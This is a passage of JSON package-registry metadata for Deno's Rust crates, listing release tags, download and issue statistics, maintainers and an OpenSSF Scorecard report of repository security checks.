fa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-15T12:40:55.799Z","dependent_packages_count":16,"downloads":728337,"downloads_period":"total","dependent_repos_count":40,"rankings":{"downloads":4.9443896313570725,"dependent_repos_count":4.642015927019853,"dependent_packages_count":2.471397592163314,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":6.773817180979163,"average":3.148574472443382},"purl":"pkg:cargo/deno_websocket","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_websocket","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_websocket","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_websocket/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-15T06:21:26.247Z","issues_count":6571,"pull_requests_count":9583,"avg_time_to_close_issue":17247523.67787189,"avg_time_to_close_pull_request":1538059.59631994,"issues_closed_count":3776,"pull_requests_closed_count":7988,"pull_request_authors_count":562,"issue_authors_count":2451,"avg_comments_per_issue":2.512707350479379,"avg_comments_per_pull_request":0.7153292288427423,"merged_pull_requests_count":6973,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":657,"past_year_pull_requests_count":1201,"past_year_avg_time_to_close_issue":1387895.1889400922,"past_year_avg_time_to_close_pull_request":1314632.8532110092,"past_year_issues_closed_count":217,"past_year_pull_requests_closed_count":654,"past_year_pull_request_authors_count":170,"past_year_issue_authors_count":367,"past_year_avg_comments_per_issue":1.2146118721461188,"past_year_avg_comments_per_pull_request":1.0591174021648626,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":22,"past_year_merged_pull_requests_count":481,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1776,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":672,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":277,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":188,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"dsherret","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":39,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_websocket/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_websocket/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_websocket/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_websocket/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_websocket/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_websocket/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:39.217Z","updated_at":"2022-11-07T18:29:39.217Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:24.531Z","updated_at":"2023-07-18T22:41:24.531Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":5307679,"name":"napi_sym","ecosystem":"cargo","description":"proc macro for writing N-API symbols","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":188,"first_release_published_at":"2022-10-05T14:14:40.004Z","latest_release_published_at":"2026-08-27T15:21:38.330Z","latest_release_number":"0.188.0","last_synced_at":"2026-09-07T22:58:26.466Z","created_at":"2022-10-05T14:25:30.503Z","updated_at":"2026-09-07T22:58:26.466Z","registry_url":"https://crates.io/crates/napi_sym/","install_command":"cargo install napi_sym","documentation_url":"https://docs.rs/napi_sym/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using 